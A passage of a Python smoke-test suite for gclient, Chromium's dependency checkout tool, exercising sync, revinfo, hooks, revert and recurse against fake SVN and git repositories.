'src/third_party/foo: %(base)s/third_party/foo@1\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--snapshot'])
out = ('# Snapshot generated with gclient revinfo --snapshot\n'
'solutions = [\n'
' { "name" : "src",\n'
' "url" : "%(base)s/src",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' "foo/bar": None,\n'
' "invalid": None,\n'
' "src/file/other": \'%(base)s/other/DEPS@2\',\n'
' "src/other": \'%(base)s/other@2\',\n'
' "src/third_party/foo": '
'\'%(base)s/third_party/foo@1\',\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
def testRevInfoAltDeps(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/', '--deps-file',
'DEPS.alt'])
self.gclient(['sync'])
results = self.gclient(['revinfo', '--snapshot'])
out = ('# Snapshot generated with gclient revinfo --snapshot\n'
'solutions = [\n'
' { "name" : "src",\n'
' "url" : "%(base)s/src",\n'
' "deps_file" : "DEPS.alt",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' "src/other2": \'%(base)s/other@2\',\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
def testWrongDirectory(self):
# Check that we're not using a .gclient configuration which only talks
# about a subdirectory src when we're in a different subdirectory src-other.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync'])
other_src = join(self.root_dir, 'src-other')
os.mkdir(other_src)
res = ('', 'Error: client not configured; see \'gclient config\'\n', 1)
self.check(res, self.gclient(['status'], other_src))
def testCorrectDirectory(self):
# Check that when we're in the subdirectory src, the .gclient configuration
# is used.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync'])
src = join(self.root_dir, 'src')
res = self.gclient(['status', '--jobs', '1'], src)
self.checkBlock(res[0], [('running', src)])
def testInitialCheckoutNotYetDone(self):
# Check that gclient can be executed when the initial checkout hasn't been
# done yet.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.parseGclient(
['sync', '--jobs', '1'],
['running', 'running',
# This is due to the way svn update is called for a
# single file when File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running', 'running', 'running', 'running'])
def testInitialCheckoutFailed(self):
# Check that gclient can be executed from an arbitrary sub directory if the
# initial checkout has failed.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync'])
# Cripple the checkout.
os.remove(join(self.root_dir, '.gclient_entries'))
src = join(self.root_dir, 'src')
res = self.gclient(['sync', '--jobs', '1'], src)
self.checkBlock(res[0],
['running', 'running', 'running'])
def testUnversionedRepository(self):
# Check that gclient automatically deletes crippled SVN repositories.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
cmd = ['sync', '--jobs', '1', '--delete_unversioned_trees', '--reset']
self.assertEquals(0, self.gclient(cmd)[-1])
third_party = join(self.root_dir, 'src', 'third_party')
subprocess2.check_call(['svn', 'propset', '-q', 'svn:ignore', 'foo', '.'],
cwd=third_party)
# Cripple src/third_party/foo and make sure gclient still succeeds.
gclient_utils.rmtree(join(third_party, 'foo', '.svn'))
self.assertEquals(0, self.gclient(cmd)[-1])
class GClientSmokeSVNTransitive(GClientSmokeBase):
FAKE_REPOS_CLASS = FakeRepoTransitive
def setUp(self):
super(GClientSmokeSVNTransitive, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_svn()
def testSyncTransitive(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
def test_case(parent, timestamp, fixed, output):
# We check out revision 'parent' and expect the following:
# - src/ is checked out at r'parent'
# - src/same_repo is checked out at r'parent' (due to --transitive)
# - src/same_repo_fixed is checked out at r'fixed'
# - src/different_repo is checked out at r'timestamp'
# (due to --transitive)
# - src/different_repo_fixed is checked out at r'fixed'
revisions = self.FAKE_REPOS.svn_revs
self.parseGclient(
['sync', '--transitive', '--revision', 'src@%d' % parent,
'--jobs', '1'], output)
self.assertTree({
'src/origin': revisions[parent]['trunk/src/origin'],
'src/DEPS': revisions[parent]['trunk/src/DEPS'],
'src/same_repo/origin': revisions[parent]['trunk/third_party/origin'],
'src/same_repo_fixed/origin':
revisions[fixed]['trunk/third_party/origin'],
'src/different_repo/origin':
revisions[timestamp]['trunk/third_party/origin'],
'src/different_repo_fixed/origin':
revisions[fixed]['trunk/third_party/origin'],
})
# Here are the test cases for checking out 'trunk/src' at r1, r2 and r3
# r1: Everything is normal
test_case(parent=1, timestamp=1, fixed=1,
output=['running', 'running', 'running', 'running', 'running'])
# r2: Svn will scan from r1 upwards until it finds a revision matching the
# given timestamp or it takes the next smallest one (which is r2 in this
# case).
test_case(parent=2, timestamp=2, fixed=1,
output=['running', 'running', 'running'])
# r3: Svn will scan from r1 upwards until it finds a revision matching the
# given timestamp or it takes the next smallest one. Since
# timestamp(r3) < timestamp(r2) svn will checkout r1.
# This happens often on http://googlecode.com but is unexpected to happen
# with svnserve (unless you manually change 'svn:date')
test_case(parent=3, timestamp=1, fixed=1,
output=['running', 'running', 'running'])
class GClientSmokeGIT(GClientSmokeBase):
def setUp(self):
super(GClientSmokeGIT, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testSync(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--jobs', '1', '--revision',
'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees'],
['deleting'])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncIgnoredSolutionName(self):
"""TODO(maruel): This will become an error soon."""
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', 'invalid@' + self.githash('repo_1', 1)],
['running', 'running'],
'Please fix your script, having invalid --revision flags '
'will soon considered an error.\n')
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncNoSolutionName(self):
if not self.enabled:
return
# When no solution name is provided, gclient uses the first solution listed.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', self.githash('repo_1', 1)],
[])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
self.assertTree(tree)
def testSyncJobs(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
# Use --jobs 1 otherwise the order is not deterministic.
self.parseGclient(
['sync', '--revision', 'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees', '--jobs', '1'],
['deleting'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testRunHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
os.remove(join(self.root_dir, 'src', 'git_hooked2'))
# runhooks runs all hooks even if not matching by design.
out = self.parseGclient(['runhooks', '--deps', 'mac'],
['running', 'running'])
self.assertEquals(1, len(out[0]))
self.assertEquals(1, len(out[1]))
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testPreDepsHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
expectation = [
('running', self.root_dir), # pre-deps hook
]
out = self.parseGclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision', 'src@' + self.githash('repo_5', 2)],
expectation)
self.assertEquals(2, len(out[0]))
self.assertEquals('pre-deps hook', out[0][1])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with runhooks.
self.gclient(['runhooks', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
# Pre-DEPS hooks run when syncing with --nohooks.
self.gclient(['sync', '--deps', 'mac', '--nohooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with --noprehooks
self.gclient(['sync', '--deps', 'mac', '--noprehooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
def testPreDepsHooksError(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
expectated_stdout = [
('running', self.root_dir), # pre-deps hook
('running', self.root_dir), # pre-deps hook (fails)
]
expected_stderr = ('Error: Command /usr/bin/python -c import sys; '
'sys.exit(1) returned non-zero exit status 1 in %s\n'
% self.root_dir)
stdout, stderr, retcode = self.gclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision',
'src@' + self.githash('repo_5', 3)])
self.assertEquals(stderr, expected_stderr)
self.assertEquals(2, retcode)
self.checkBlock(stdout, expectated_stdout)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(base)srepo_1\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3\n' %
{
'base': self.git_base,
'hash2': self.githash('repo_2', 1)[:7],
})
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(base)srepo_1@%(hash1)s\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3@%(hash3)s\n' %
{
'base': self.git_base,
'hash1': self.githash('repo_1', 2),
'hash2': self.githash('repo_2', 1),
'hash3': self.githash('repo_3', 2),
})
self.check((out, '', 0), results)
class GClientSmokeGITMutates(GClientSmokeBase):
"""testRevertAndStatus mutates the git repo so move it to its own suite."""
def setUp(self):
super(GClientSmokeGITMutates, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testRevertAndStatus(self):
if not self.enabled:
return
# Commit new change to repo to make repo_2's hash use a custom_var.
cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
repo_2_hash = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
new_deps = cur_deps.replace('repo_2@%s\'' % repo_2_hash,
'repo_2@\' + Var(\'r2hash\')')
new_deps = 'vars = {\'r2hash\': \'%s\'}\n%s' % (repo_2_hash, new_deps)
self.FAKE_REPOS._commit_git('repo_1', { # pylint: disable=W0212
'DEPS': new_deps,
'origin': 'git/repo_1@3\n',
})
config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
"custom_vars" : %(custom_vars)s,
}]""")
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {}
}])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac'])
write(join(self.root_dir, 'src', 'repo2', 'hi'), 'Hey!')
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
# Revert implies --force implies running hooks without looking at pattern
# matching. For each expected path, 'git reset' and 'git clean' are run, so
# there should be two results for each. The last two results should reflect
# writing git_hooked1 and git_hooked2. There's only one result for the third
# because it is clean and has no output for 'git clean'.
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Make a new commit object in the origin repo, to force reset to fetch.
self.FAKE_REPOS._commit_git('repo_2', { # pylint: disable=W0212
'origin': 'git/repo_2@3\n',
})
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {'r2hash': self.FAKE_REPOS.git_hashes['repo_2'][-1][0] }
}])
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@3', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
results = self.gclient(['status', '--deps', 'mac', '--jobs', '1'])
out = results[0].splitlines(False)
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
class GClientSmokeBoth(GClientSmokeBase):
def setUp(self):
super(GClientSmokeBoth, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_svn() and self.FAKE_REPOS.set_up_git()
def testMultiSolutions(self):
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/"},'
'{"name": "src-git",'
'"url": "' + self.git_base + 'repo_1"}]'])
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running',
# This is due to the way svn update is called for a single
# file when File() is used in a DEPS file.
('running', self.root_dir + '/src/file/other'),
'running', 'running', 'running', 'running',
'running', 'running'])
tree = self.mangle_git_tree(('repo_1@2', 'src-git'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree.update(self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other')))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testMultiSolutionsJobs(self):
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/"},'
'{"name": "src-git",'
'"url": "' + self.git_base + 'repo_1"}]'])
# There is no guarantee that the ordering will be consistent.
(stdout, stderr, returncode) = self.gclient(
['sync', '--deps', 'mac', '--jobs', '8'])
stdout = self.untangle(stdout)
self.checkString('', stderr)
self.assertEquals(0, returncode)
results = self.splitBlock(stdout)
self.assertEquals(9, len(results))
tree = self.mangle_git_tree(('repo_1@2', 'src-git'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree.update(self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other')))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testMultiSolutionsMultiRev(self):
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/"},'
'{"name": "src-git",'
'"url": "' + self.git_base + 'repo_1"}]'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1', '--revision', '1',
'-r', 'src-git@' + self.githash('repo_1', 1)],
['running', 'running', 'running', 'running'],
expected_stderr=
'You must specify the full solution name like --revision src@1\n'
'when you have multiple solutions setup in your .gclient file.\n'
'Other solutions present are: src-git.\n')
tree = self.mangle_git_tree(('repo_1@1', 'src-git'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree.update(self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout')))
self.assertTree(tree)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/"},'
'{"name": "src-git",'
'"url": "' + self.git_base + 'repo_1"}]'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(svn_base)s/src/\n'
'src-git: %(git_base)srepo_1\n'
'src/file/other: File("%(svn_base)s/other/DEPS")\n'
'src/other: %(svn_base)s/other\n'
'src/repo2: %(git_base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(git_base)srepo_3\n'
'src/third_party/foo: %(svn_base)s/third_party/foo@1\n') % {
'svn_base': self.svn_base + 'trunk',
'git_base': self.git_base,
'hash2': self.githash('repo_2', 1)[:7],
}
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(svn_base)s/src/@2\n'
'src-git: %(git_base)srepo_1@%(hash1)s\n'
'src/file/other: %(svn_base)s/other/DEPS@2\n'
'src/other: %(svn_base)s/other@2\n'
'src/repo2: %(git_base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(git_base)srepo_3@%(hash3)s\n'
'src/third_party/foo: %(svn_base)s/third_party/foo@1\n') % {
'svn_base': self.svn_base + 'trunk',
'git_base': self.git_base,
'hash1': self.githash('repo_1', 2),
'hash2': self.githash('repo_2', 1),
'hash3': self.githash('repo_3', 2),
}
self.check((out, '', 0), results)
def testRecurse(self):
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/"},'
'{"name": "src-git",'
'"url": "' + self.git_base + 'repo_1"}]'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['recurse', '-j1', 'sh', '-c',
'echo $GCLIENT_SCM,$GCLIENT_URL,`pwd`'])
entries = [tuple(line.split(','))
for line in results[0].strip().split('\n')]
logging.debug(entries)
bases = {'svn': self.svn_base, 'git': self.git_base}
expected_source = [
('svn', 'trunk/src/', 'src'),
('git', 'repo_1', 'src-git'),
('svn', 'trunk/other', 'src/other'),
('git', 'repo_2@' + self.githash('repo_2', 1)[:7], 'src/repo2'),
('git', 'repo_3', 'src/repo2/repo_renamed'),
('svn', 'trunk/third_party/foo@1', 'src/third_party/foo'),
]
expected = [(scm, bases[scm] + url, os.path.join(self.root_dir, path))
for (scm, url, path) in expected_source]
self.assertEquals(sorted(entries), sorted(expected))
class SkiaDEPSTransitionSmokeTest(GClientSmokeBase):
"""Simulate the behavior of bisect bots as they transition across the Skia
DEPS change."""
FAKE_REPOS_CLASS = FakeRepoSkiaDEPS
def setUp(self):
super(SkiaDEPSTransitionSmokeTest, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git() and self.FAKE_REPOS.set_up_svn()
def testSkiaDEPSChangeSVN(self):
if not self.enabled:
return
# Create an initial checkout:
# - Single checkout at the root.
# - Multiple checkouts in a shared subdirectory.
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.svn_base + 'trunk/src/",'
'}]'])
checkout_path = os.path.join(self.root_dir, 'src')
skia = os.path.join(checkout_path, 'third_party', 'skia')
skia_gyp = os.path.join(skia, 'gyp')
skia_include = os.path.join(skia, 'include')
skia_src = os.path.join(skia, 'src')
gyp_svn_url = self.svn_base + 'skia/gyp'
include_svn_url = self.svn_base + 'skia/include'
src_svn_url = self.svn_base + 'skia/src'
skia_git_url = self.git_base + 'repo_1'
# Initial sync. Verify that we get the expected checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
self.assertEqual(res[2], 0, 'Initial sync failed.')
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
gyp_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
include_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
src_svn_url)
# Verify that the sync succeeds. Verify that we have the expected merged
# checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@3'])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync again. Verify that we still have the expected merged checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@3'])
self.assertEqual(res[2], 0, 'Subsequent sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync back to the original DEPS. Verify that we get the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
self.assertEqual(res[2], 0, 'Reverse sync failed.')
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
gyp_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
include_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
src_svn_url)
# Sync again. Verify that we still have the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
gyp_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
include_svn_url)
self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
src_svn_url)
def testSkiaDEPSChangeGit(self):
if not self.enabled:
return
# Create an initial checkout:
# - Single checkout at the root.
# - Multiple checkouts in a shared subdirectory.
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_2",'
'}]'])
checkout_path = os.path.join(self.root_dir, 'src')
skia = os.path.join(checkout_path, 'third_party', 'skia')
skia_gyp = os.path.join(skia, 'gyp')
skia_include = os.path.join(skia, 'include')
skia_src = os.path.join(skia, 'src')
gyp_git_url = self.git_base + 'repo_3'
include_git_url = self.git_base + 'repo_4'
src_git_url = self.git_base + 'repo_5'
skia_git_url = self.FAKE_REPOS.git_base + 'repo_1'
pre_hash = self.githash('repo_2', 1)
post_hash = self.githash('repo_2', 2)
# Initial sync. Verify that we get the expected checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Initial sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Verify that the sync succeeds. Verify that we have the expected merged
# checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync again. Verify that we still have the expected merged checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'Subsequent sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync back to the original DEPS. Verify that we get the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Reverse sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Sync again. Verify that we still have the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
class GClientSmokeFromCheckout(GClientSmokeBase):
# WebKit abuses this. It has a .gclient and a DEPS from a checkout.
def setUp(self):
super(GClientSmokeFromCheckout, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_svn()
os.rmdir(self.root_dir)
if self.enabled:
usr, pwd = self.FAKE_REPOS.USERS[0]
subprocess2.check_call(
['svn', 'checkout', self.svn_base + '/trunk/webkit',
self.root_dir, '-q',
'--non-interactive', '--no-auth-cache',
'--username', usr, '--password', pwd])
def testSync(self):
if not self.enabled:
return
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
tree = self.mangle_svn_tree(
('trunk/webkit@2', ''),
('trunk/third_party/foo@1', 'foo/bar'))
self.assertTree(tree)
def testRevertAndStatus(self):
if not self.enabled:
return
self.gclient(['sync'])
# TODO(maruel): This is incorrect.
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])
# Revert implies --force implies running hooks without looking at pattern
# matching.
results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
out = self.splitBlock(results[0])
self.assertEquals(2, len(out))
self.checkString(2, len(out[0]))
self.checkString(2, len(out[1]))
self.checkString('foo', out[1][1])
self.checkString('', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/webkit@2', ''),
